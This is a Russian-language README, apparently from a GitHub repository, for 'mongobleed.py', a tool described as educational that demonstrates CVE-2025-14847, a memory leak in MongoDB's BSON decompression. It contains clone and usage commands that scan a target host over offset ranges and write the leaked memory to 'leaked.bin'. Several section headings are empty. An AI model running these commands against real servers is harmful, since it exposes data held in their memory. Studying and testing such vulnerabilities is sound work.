
Этот репозиторий содержит образовательный исследовательский инструмент, предназначенный для демонстрации концепций безопасности памяти, лежащих в основе CVE-2025-14847, критической уязвимости, обнаруженной в реализации декомпрессии BSON в MongoDB. Инструмент моделирует, как некорректная проверка границ при декомпрессии может привести к утечке памяти.
Этот инструмент демонстрирует:
Предварительные требования
git clone https://github.com/InfoSecAntara/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Basic scan (offsets 20-8192)
python3 mongobleed.py --host <target>
# Deep scan for more data
python3 mongobleed.py --host <target> --max-offset 50000
# Custom range
python3 mongobleed.py --host <target> --min-offset 100 --max-offset 20000
Эта уязвимость подчёркивает более широкие проблемы в безопасности баз данных:
Официальные ресурсы:
| Параметр | По умолчанию | Описание |
|---|
--host | localhost | Целевой хост MongoDB |
--port | 27017 | Целевой порт MongoDB |
--min-offset | 20 | Минимальная длина документа для проверки |
--max-offset | 8192 | Максимальная длина документа для проверки |
--output | leaked.bin | Выходной файл для утёкших данных |